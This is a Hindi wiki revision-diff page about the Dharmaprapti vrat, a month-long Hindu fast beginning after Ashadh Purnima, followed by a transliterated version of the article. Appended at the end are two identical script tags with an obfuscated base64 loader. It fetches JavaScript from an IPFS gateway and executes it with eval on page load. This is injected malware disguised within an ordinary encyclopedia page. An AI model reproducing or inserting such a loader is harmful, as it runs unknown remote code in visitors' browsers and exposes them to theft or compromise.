Difference between revisions of "धर्मप्राप्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[आषाढ़]] [[पूर्णिमा]] के उपरान्त प्रथम तिथि से आरम्भ होता है।
 
*[[आषाढ़]] [[पूर्णिमा]] के उपरान्त प्रथम तिथि से आरम्भ होता है।
 
*धर्म के रूप में भगवान [[विष्णु]] की पूजा की जाती है।
 
*धर्म के रूप में भगवान [[विष्णु]] की पूजा की जाती है।
Line 6: Line 6:
 
*जिनमें पूर्णिमा भी सम्मिलित है।
 
*जिनमें पूर्णिमा भी सम्मिलित है।
 
*मास के अन्त में स्वर्णदान दिया जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|209|1-3)।</ref>
 
*मास के अन्त में स्वर्णदान दिया जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|209|1-3)।</ref>
 
+
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:29, 15 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ashadh poornima ke uparant pratham tithi se arambh hota hai.
  • dharm ke roop mean bhagavan vishnu ki pooja ki jati hai.
  • yah vrat ek mas tak chalata hai.
  • is vrat mean tin dinoan tak upavas kiya jata hai.
  • jinamean poornima bhi sammilit hai.
  • mas ke ant mean svarnadan diya jata hai.[1]


tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|209|1-3).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>